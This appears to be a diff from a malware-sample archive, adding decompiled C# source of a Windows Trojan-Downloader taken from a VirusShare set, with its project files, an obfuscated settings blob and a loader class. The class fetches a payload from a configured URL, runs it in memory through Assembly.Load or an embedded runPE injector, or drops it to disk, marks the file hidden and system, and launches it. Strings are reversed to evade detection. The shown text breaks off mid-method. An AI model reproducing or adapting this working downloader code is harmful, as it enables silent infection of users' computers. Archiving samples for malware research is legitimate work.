auto-decompiled msil via petikvx

add

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/AssemblyInfo.cs

@@ -0,0 +1,16 @@
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Security.Permissions;
+
+[assembly: AssemblyProduct("Product name")]
+[assembly: Guid("694b4498-936e-469c-86fb-8d5608191d12")]
+[assembly: ComVisible(false)]
+[assembly: AssemblyTrademark("Trademark")]
+[assembly: AssemblyCopyright("Copyright")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
+[assembly: AssemblyCompany("Company name")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyDescription("File Description")]
+[assembly: AssemblyTitle("Title")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Rjk3ibeceopw5x00uimwa5h2w/ch2futx3h3zpmhyzsblwlfrdktcnf3voh.cs

@@ -0,0 +1,29 @@
+// Decompiled with JetBrains decompiler
+// Type: Rjk3ibeceopw5x00uimwa5h2w.ch2futx3h3zpmhyzsblwlfrdktcnf3voh
+// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
+
+using System;
+using System.Runtime.InteropServices;
+
+namespace Rjk3ibeceopw5x00uimwa5h2w
+{
+  public class ch2futx3h3zpmhyzsblwlfrdktcnf3voh
+  {
+    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
+    public static extern IntPtr Pnqgzzjk5f0hyikci(string lpModuleName);
+
+    [DllImport("kernel32.dll", EntryPoint = "FindResourceA")]
+    public static extern IntPtr Ffz3mpnfyg4clsrkfrhqubycp(
+      IntPtr hModule,
+      int lpID,
+      string lpType);
+
+    [DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)]
+    public static extern IntPtr yeyqpjvohzgayjchvjm2bzdvn(IntPtr hModule, IntPtr hResInfo);
+
+    [DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)]
+    public static extern uint Ncmhhqqsfk5fqfa4eo2qymkyp(IntPtr hModule, IntPtr hResInfo);
+  }
+}

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Settings.xml

@@ -0,0 +1 @@
+½¾ùìí¡÷äóòèîï¼£°¯±£¾¿Œ‹½ÑóîõäâõèîïÒõôã×àíôäò¿Œ‹¡¡½Åäíèìèõäóò¿Œ‹¡¡¡¡½ÒõôãÅäíèì¿åçöêê÷ðë±ïñµõó°´ùõëæðõ²ëó½®ÒõôãÅäíè쿌‹¡¡¡¡½ÌäòòàæäÅäíèì¿ñõêûñôôå³²âçà÷õäâ±æû÷óí´ä½®ÌäòòàæäÅäíè쿌‹¡¡¡¡½ÀíæîÅäíèì¿Ôàûêøñðïâæí÷ó´ûòò½®ÀíæîÅäíè쿌‹¡¡¡¡½ìèòâäííàïäîôòÅäíèì¿çè÷æî±òãê÷ê´îææãøãöøëêäæä½®ìèòâäííàïäîôòÅäíè쿌‹¡¡¡¡½öäãÆäõÅäíèì¿åìñãé÷±âîðæãâðã÷í½®öäãÆäõÅäíè쿌‹¡¡¡¡½ÃîôïåÇèíäÅäíèì¿ûçêîååðóå±÷òéâèîåçåê°ðàøö½®ÃîôïåÇèíäÅäíè쿌‹¡¡¡¡½ÏäöÃîôïåÇèíäÅäíèì¿æðëèä´æ±ôí÷öçéò°õµ÷ëøùõ²ê½®ÏäöÃîôïåÇèíäÅäíè쿌‹¡¡½®Åäíèìèõäóò¿Œ‹¡¡½Óäòîôóâäò¿Œ‹¡¡¡¡½ÓäòîôóâäÕøñ俌‹¡¡¡¡¡¡½ÒäõõèïæòÕøñä¿ÐÕ±ÏÉÔÉÐÑÍË°ÄÅÔÔÖÅÒسÉÎÈËÔÈÖÇÕ°Ô³½®ÒäõõèïæòÕøñ俌‹¡¡¡¡¡¡½ÅàõàÕøñä¿ËÃÒÐ̵µ×ÎÑÖËÛÊÅÐѽ®ÅàõàÕøñ俌‹¡¡¡¡¡¡½ÃèïåäóÕøñä¿ÐÏÐÆ˲˴ÃÇÖÑÃÛʳÂÌÃ×ÖÀÍÅϽ®ÃèïåäóÕøñ俌‹¡¡¡¡½®ÓäòîôóâäÕøñ俌‹¡¡¡¡½ÓäòîôóâäÈÅ¿Œ‹¡¡¡¡¡¡½ÒäõõèïæòÈÅ¿´´½®ÒäõõèïæòÈÅ¿Œ‹¡¡¡¡¡¡½ÅàõàÈÅ¿²¹½®ÅàõàÈÅ¿Œ‹¡¡¡¡¡¡½ÃèïåäóÈÅ¿¸´½®ÃèïåäóÈÅ¿Œ‹¡¡¡¡½®ÓäòîôóâäÈÅ¿Œ‹¡¡½®Óäòîôóâäò¿Œ‹¡¡½Óäìî÷äÂîå俌‹¡¡¡¡½ÌäòòàæäÃîù¿Õóôä½®ÌäòòàæäÃîù¿Œ‹¡¡¡¡½Òõàóõôñ¿Õóôä½®Òõàóõôñ¿Œ‹¡¡¡¡½Ãèïåäó¿Õóôä½®Ãèïåä󿌋¡¡¡¡½Âîìñóäòòèîï¿Õóôä½®Âîìñóäòòèîￌ‹¡¡¡¡½ÖäãÆäõ¿Õóôä½®ÖäãÆäõ¿Œ‹¡¡½®Óäìî÷äÂîå俌‹¡¡½ÕóàïòçäóÕøñ俌‹¡¡¡¡½Óäòîôóâä¿Õóôä½®Óäòîôóâ俌‹¡¡½®ÕóàïòçäóÕøñ俌‹¡¡½ÓôïÑÄÌèòòèï濌‹¡¡¡¡½ÌèòòèïæÑÄ¿Çàíòä½®ÌèòòèïæÑÄ¿Œ‹¡¡¡¡½ÒõôãÄïâóøñõèîￌ‹¡¡¡¡¡¡½äïâóøñõèîïÔòäå¿ÙÎÓ½®äïâóøñõèîïÔòä忌‹¡¡¡¡¡¡½àííÄïâóøñõèîïò¿Çàíòä½®àííÄïâóøñõèîïò¿Œ‹¡¡¡¡½®ÒõôãÄïâóøñõèîￌ‹¡¡½®ÓôïÑÄÌèòòèï濌‹½®ÑóîõäâõèîïÒõôã×àíôäò¿

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Trojan-Downloader.Win32.VB.anrt.csproj

@@ -0,0 +1,47 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>hh2ifwz3</AssemblyName>
+    <ApplicationVersion>1.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="wisp1ff1rpzacn3jgfnasrkhmiolo44qt.cs" />
+    <Compile Include="panz0mon2f5aateyhtphwozah.cs" />
+    <Compile Include="Rjk3ibeceopw5x00uimwa5h2w\ch2futx3h3zpmhyzsblwlfrdktcnf3voh.cs" />
+    <Compile Include="Vza1nv3mnlezcxvyx\ekrod4bellvfxnmof.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="runPE.dll" />
+    <EmbeddedResource Include="Settings.xml" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Trojan-Downloader.Win32.VB.anrt.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hh2ifwz3", "Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.csproj", "{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Vza1nv3mnlezcxvyx/ekrod4bellvfxnmof.cs

@@ -0,0 +1,524 @@
+// Decompiled with JetBrains decompiler
+// Type: Vza1nv3mnlezcxvyx.ekrod4bellvfxnmof
+// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
+
+using Microsoft.Win32;
+using Rjk3ibeceopw5x00uimwa5h2w;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.IO.Compression;
+using System.Net;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Vza1nv3mnlezcxvyx
+{
+  public class ekrod4bellvfxnmof
+  {
+    private static bool Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
+    private byte[] Tts2baf3wiatv5ghnswu3fu4o;
+    private bool sdztd0ena42ywf4cfnspntfxhjgjjuo2x;
+    private string vazu5g3yn2qoupbzrnflcm5ta;
+    private string jfq5w2hqrukvsivotb2eaetcj;
+    private string H43ao0q1ckx2y3w0qhozixdn5 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
+    private int C2zbxxi4za2fdbthchmjymbz0;
+    private int Zusxmm13kjq0lro02;
+    private int Byijlyljtwhknkf5jkcwcjhnmxbyfow1f;
+    private string Mi5ejdb45agibefgw = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ROX");
+    private string Vwrshilkfvt1muxtiaxqao2vn = string.Empty;
+    private string Va4nkquvaa0egawrugbp4frralrih1cl5 = string.Empty;
+    private int vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb;
+    private string act0dsy5xkcjtyk4udzmsxpor = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
+    private string mehj1nkb5kab31y4pa5zzd3zh = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
+    private string Z2sx3vgolcrkx42a5b2bhnmdt = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
+    private string wvlwdt5q3igbdkbluauqgzxazzitgesk2 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
+    private string ljjgffrum0vanmiev3ujguzbfjpaluf1a = string.Empty;
+    private string Ns5tkmgwpxzdzhfzygk50izkv = string.Empty;
+    private string Dxpmu5z21l0jogt41vcdm0t2p = string.Empty;
+    private string hdb50yp4mb51cxajtk2qahcip = string.Empty;
+    private string Qmztipvjjobds0bdpgipbz14g = string.Empty;
+    private string mqmfhbfuww2freoox = string.Empty;
+    private string Kkrle03d2ekkcyuc2c2102hjd = string.Empty;
+    private string hyrbz1kfxjvaxj0vistcunjymen3kporm = string.Empty;
+    private string Ajiami1b52zvc3vohgymtmh5a = string.Empty;
+    private string R3u01lftwibuhcd22 = string.Empty;
+    private string Zjtchyef12cwxg4onylzlprmn = string.Empty;
+    private bool cxhxnrorc5mp1ujxhtq1kbke4;
+    private bool Fkgl04y45wljpapzd;
+    private string U5rbzma1hlby3eyyhjbmc5kyd = string.Empty;
+    private string Odlyq3qfbpoq3mg0so5fipxwu = string.Empty;
+    private bool cwygyk0oxmm4oly4f;
+    private string Obpmsku4cgcztab1lmoobkyt5 = string.Empty;
+    private string gkgcqdokyjuxym4wq0314usgk = string.Empty;
+    private string nd5mirnaddlzplmuj2yyvlyhv = string.Empty;
+    private string Jxy14wwtwogymn1qrjcja2xpw = string.Empty;
+    private bool Mebghajzp0czroix5exzsbjcb;
+    private bool rkkwfbuqo0azkksqy;
+    private bool buvpnbb4jdddrparyku5zhpzb;
+    private bool cgkruwksz1uyngdvorfai14estiwjwa22;
+    private object zuc0g2puhfoogprwx4kio2wu1;
+    private MethodInfo Gdjkuqh0cbgb2rrfkrtpdepl3;
+
+    private byte[] h3mz2iy1yrgiwje2h(
+      byte[] V1vn1s3fuxwiz1zga0ixvfsqwh4o403an,
+      int nmn3ufkvroquqymwx)
+    {
+      GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(V1vn1s3fuxwiz1zga0ixvfsqwh4o403an), CompressionMode.Decompress);
+      byte[] buffer = new byte[nmn3ufkvroquqymwx];
+      gzipStream.Read(buffer, 0, buffer.Length);
+      return buffer;
+    }
+
+    private object Xthp414gtl2l4oueqfpd4vbwz(int nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf)
+    {
+      Assembly assembly = Assembly.Load(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(ekrod4bellvfxnmof.S2suq1p5s53jd0tp35scdyryf(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lld.EPnur"))));
+      Thread.Sleep(1000);
+      System.Type type = assembly.GetTypes()[nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf];
+      this.Gdjkuqh0cbgb2rrfkrtpdepl3 = type.GetMethod(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("nuR"));
+      return Activator.CreateInstance(type);
+    }
+
+    public static byte[] S2suq1p5s53jd0tp35scdyryf(string qocihecx3yidmrejz)
+    {
+      using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(qocihecx3yidmrejz))
+      {
+        byte[] buffer = new byte[1024];
+        using (MemoryStream memoryStream = new MemoryStream())
+        {
+          while (true)
+          {
+            int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
+            if (count > 0)
+              memoryStream.Write(buffer, 0, count);
+            else
+              break;
+          }
+          return memoryStream.ToArray();
+        }
+      }
+    }
+
+    private byte[] pcbc3w2jxlqgmdfs0dlf3dbkc(byte[] Rmzrohqsvjl2eukqp)
+    {
+      if (this.Mi5ejdb45agibefgw == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("rox"))
+        Rmzrohqsvjl2eukqp = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(Rmzrohqsvjl2eukqp);
+      return Rmzrohqsvjl2eukqp;
+    }
+
+    private void Dsqyxep1xbkqqwuokcmpwlnunygdkudqf()
+    {
+      try
+      {
+        byte[] numArray = new WebClient().DownloadData(new Uri(this.Obpmsku4cgcztab1lmoobkyt5));
+        if (this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
+        {
+          try
+          {
+            if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
+            {
+              this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
+              this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
+              {
+                (object) numArray,
+                (object) this.Odlyq3qfbpoq3mg0so5fipxwu,
+                null
+              });
+            }
+          }
+          catch
+          {
+            string tempFileName = Path.GetTempFileName();
+            this.c55ygxxz3rp1vsemw5o013b42(numArray, tempFileName, true);
+          }
+        }
+        if (!(this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
+          return;
+        string str = this.nd5mirnaddlzplmuj2yyvlyhv + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.Jxy14wwtwogymn1qrjcja2xpw;
+        this.c55ygxxz3rp1vsemw5o013b42(numArray, str, true);
+        if (this.Mebghajzp0czroix5exzsbjcb)
+          System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
+        if (this.rkkwfbuqo0azkksqy)
+          System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
+        if (!this.buvpnbb4jdddrparyku5zhpzb)
+          return;
+        System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
+      }
+      catch (Exception ex)
+      {
+      }
+    }
+
+    private static void kv5qn4lnozkkzgj3vdlka0jwl(byte[] Aucuhbtavanuedaqa)
+    {
+      try
+      {
+        Thread thread = new Thread(new ParameterizedThreadStart(ekrod4bellvfxnmof.Ezm5v3x5yymbsublp));
+        thread.SetApartmentState(ApartmentState.STA);
+        thread.Start((object) Aucuhbtavanuedaqa);
+        thread.Join();
+      }
+      catch
+      {
+        ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
+      }
+    }
+
+    private static void Ezm5v3x5yymbsublp(object cbftjeed2ce2adwwe4mzldgan)
+    {
+      try
+      {
+        MethodInfo entryPoint = Assembly.Load((byte[]) cbftjeed2ce2adwwe4mzldgan).EntryPoint;
+        if (entryPoint.GetParameters().Length == 1)
+          entryPoint.Invoke((object) null, new object[1]
+          {
+            (object) new string[0]
+          });
+        else
+          entryPoint.Invoke((object) null, (object[]) null);
+      }
+      catch
+      {
+        ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
+      }
+    }
+
+    private bool Eapnz3st2tmrdospqmsffns5v(byte[] cjulchhdqxyzkyudifjjo2o31)
+    {
+      ekrod4bellvfxnmof.kv5qn4lnozkkzgj3vdlka0jwl(cjulchhdqxyzkyudifjjo2o31);
+      bool pfc4nm2xfxznssiyioxrgqtphwj0yo4me = ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
+      ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
+      return pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
+    }
+
+    private void c55ygxxz3rp1vsemw5o013b42(
+      byte[] hzigskm110h1nfyzxef4f250l,
+      string Sykxwcxny5q4qajbe,
+      bool hfm3jqdunhihvesbsfgqdjg4j)
+    {
+      try
+      {
+        System.IO.File.WriteAllBytes(Sykxwcxny5q4qajbe, hzigskm110h1nfyzxef4f250l);
+        if (!hfm3jqdunhihvesbsfgqdjg4j)
+          return;
+        new Process()
+        {
+          StartInfo = {
+            FileName = Sykxwcxny5q4qajbe
+          }
+        }.Start();
+      }
+      catch
+      {
+      }
+    }
+
+    private byte[] n321udrptnm3xnkdwdxsh0wft(
+      string Juxxajgoa55m1rpp3wo1ces5w,
+      int Doydtmooq4wyxmncj,
+      string q05wpvgwzb3o3sxhl)
+    {
+      try
+      {
+        IntPtr hModule = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Pnqgzzjk5f0hyikci(string.Empty);
+        IntPtr hResInfo = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ffz3mpnfyg4clsrkfrhqubycp(hModule, Doydtmooq4wyxmncj, q05wpvgwzb3o3sxhl);
+        uint length = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ncmhhqqsfk5fqfa4eo2qymkyp(hModule, hResInfo);
+        IntPtr source = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.yeyqpjvohzgayjchvjm2bzdvn(hModule, hResInfo);
+        byte[] destination = new byte[(IntPtr) length];
+        Marshal.Copy(source, destination, 0, (int) length);
+        return destination;
+      }
+      catch (Exception ex)
+      {
+        Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :ecruoser gnidaer rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
+        return (byte[]) null;
+      }
+    }
+
+    private string rxto5yfudomwo4quiatvxlgxu(string Mbiqervyw5m4axeh1jzypdawz)
+    {
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaP noitacilppA"))
+        Mbiqervyw5m4axeh1jzypdawz = Application.StartupPath + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("pmeT"))
+        Mbiqervyw5m4axeh1jzypdawz = Path.GetTempPath();
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ataDppA"))
+        Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("stnemucoD yM"))
+        Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("potkseD"))
+        Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("eliforP resU"))
+        Mbiqervyw5m4axeh1jzypdawz = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ELIFORPRESU")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("seliF margorP"))
+        Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      return Mbiqervyw5m4axeh1jzypdawz;
+    }
+
+    private string Lzzeex3tbjpnswaet3q3lgne0(string Xp3a2j1mbsdadmfpxakut5qur)
+    {
+      string str = string.Empty;
+      if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
+        str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+        str = Path.GetTempPath();
+      if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2"))
+        str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
+      return str;
+    }
+
+    private void Myk2onyuqzunnxikmdzm0nc2t(string Rmzrohqsvjl2eukqp)
+    {
+      string[] separator1 = new string[1]
+      {
+        wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("k3txyjv4t1shfwvlu0g5eijqg")
+      };
+      string[] separator2 = new string[1]
+      {
+        wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("wyaq1kdfdoichsv0drqddokfz")
+      };
+      string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
+      string empty1 = string.Empty;
+      string empty2 = string.Empty;
+      string empty3 = string.Empty;
+      for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
+      {
+        string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
+        byte[] numArray = panz0mon2f5aateyhtphwozah.ydxqx4ckpkuemhnp4n2eb4laj(strArray2[1]);
+        string str1 = strArray2[2];
+        bool boolean1 = Convert.ToBoolean(strArray2[3]);
+        string Mbiqervyw5m4axeh1jzypdawz = strArray2[4];
+        bool boolean2 = Convert.ToBoolean(strArray2[5]);
+        bool boolean3 = Convert.ToBoolean(strArray2[6]);
+        int int32 = Convert.ToInt32(strArray2[7]);
+        bool boolean4 = Convert.ToBoolean(strArray2[8]);
+        string str2 = this.rxto5yfudomwo4quiatvxlgxu(Mbiqervyw5m4axeh1jzypdawz);
+        if (boolean1)
+        {
+          if (boolean3)
+            numArray = this.h3mz2iy1yrgiwje2h(numArray, int32);
+          if (boolean2)
+            numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
+          if (!boolean4)
+          {
+            try
+            {
+              this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
+              this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
+              {
+                (object) numArray,
+                (object) this.Odlyq3qfbpoq3mg0so5fipxwu,
+                null
+              });
+            }
+            catch (Exception ex)
+            {
